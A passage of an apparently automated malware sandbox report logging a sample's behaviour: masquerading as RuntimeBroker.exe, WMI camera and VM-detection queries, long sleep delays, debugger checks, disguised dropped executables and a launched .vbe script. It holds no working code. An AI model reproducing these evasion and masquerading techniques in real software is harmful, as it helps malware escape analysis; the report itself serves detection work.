                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\savesSession\ComponentBrokermonitor.exeMemory allocated: 1340000 memory reserve | memory write watchJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeMemory allocated: 1AE50000 memory reserve | memory write watchJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1AED0000 memory reserve | memory write watchJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599873Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599758Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599622Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599513Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599406Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599265Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599155Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 300000Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599045Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598931Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598820Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598688Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598563Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598438Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598328Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598219Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598094Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597985Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597875Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597766Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597641Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597532Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597407Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597282Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597140Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597013Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596903Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596796Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596688Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596563Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596438Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596313Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596188Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596078Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595969Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595860Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595735Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595610Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595485Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595360Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595250Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595141Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595027Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 594907Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 594782Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeWindow / User API: threadDelayed 3435Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeWindow / User API: threadDelayed 6245Jump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\MqhNXtrC.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\lAIZxBgi.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\HufwPOBJ.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\yZRgoalJ.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\ERuFRGqx.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\vomPhMaQ.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\odsQwJqu.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\HCaVYTBq.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\PYnlzHQq.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\jpaRTMbF.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\eKDszVMz.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\yIzGwiSf.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\gNqaUEQu.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\JfKMXbLC.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exe TID: 2044Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6656Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -599873s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -599758s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -599622s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -599513s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -599406s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -599265s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -599155s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 7060Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -599045s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -598931s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -598820s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -598688s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -598563s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -598438s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -598328s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -598219s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -598094s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -597985s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -597875s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -597766s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -597641s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -597532s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -597407s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -597282s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -597140s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -597013s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -596903s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -596796s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -596688s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -596563s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -596438s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -596313s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -596188s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -596078s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -595969s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -595860s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -595735s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -595610s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -595485s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -595360s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -595250s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -595141s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -595027s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -594907s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772Thread sleep time: -594782s >= -30000sJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E0A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00E0A69B
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00E1C220
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1E6A3 VirtualQuery,GetSystemInfo,0_2_00E1E6A3
                          Source: C:\savesSession\ComponentBrokermonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599873Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599758Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599622Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599513Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599406Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599265Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599155Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 300000Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599045Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598931Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598820Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598688Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598563Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598438Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598328Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598219Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598094Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597985Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597875Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597766Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597641Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597532Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597407Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597282Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597140Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597013Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596903Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596796Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596688Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596563Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596438Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596313Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596188Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596078Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595969Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595860Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595735Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595610Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595485Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595360Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595250Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595141Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595027Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 594907Jump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 594782Jump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: wscript.exe, 00000001.00000002.1735895163.0000000000D6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f56
                          Source: FNDmTgDttMjJpiTujJnAGafC.exe.4.drBinary or memory string: IdcncAvMCIK6eHptdyHC
                          Source: w32tm.exe, 00000008.00000002.1816399189.00000198676E8000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2901752141.000000001B943000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: wscript.exe, 00000001.00000003.1732498622.0000000000D2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeAPI call chain: ExitProcess graph end nodegraph_0-25053
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E1F838
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E27DEE mov eax, dword ptr fs:[00000030h]0_2_00E27DEE
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E2C030 GetProcessHeap,0_2_00E2C030
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E1F838
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1F9D5 SetUnhandledExceptionFilter,0_2_00E1F9D5
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E1FBCA
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E28EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E28EBD
                          Source: C:\savesSession\ComponentBrokermonitor.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe" Jump to behavior
